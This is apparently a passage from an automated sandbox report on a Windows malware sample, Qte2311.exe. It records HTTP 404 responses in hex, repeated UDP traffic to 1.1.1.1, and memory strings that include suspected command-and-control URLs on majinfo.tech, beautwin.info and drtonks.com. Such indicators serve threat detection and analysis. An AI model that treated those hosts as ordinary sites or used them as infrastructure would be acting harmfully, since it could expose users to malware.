Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Tue, 21 Nov 2023 03:47:15 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Nov 2023 03:49:00 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Nov 2023 03:49:02 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Nov 2023 03:49:05 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Nov 2023 03:49:08 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: runas.exe, 00000005.00000002.4111828153.0000000005C9C000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://majinfo.tech/u0t4/?ipNhfX=pk6UlYKypwTcdRigHYvXwaXnbRoM4y7Rx6CIM21Q8kT0nxxz4tr7Q0wSojmMfoxURV3
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4112751234.0000000004822000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.beautwin.info
Source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4112751234.0000000004822000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.beautwin.info/u0t4/
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: runas.exe, 00000005.00000002.4111828153.00000000057E6000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000002846000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2051780672.000000000CE96000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.drtonks.com/
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
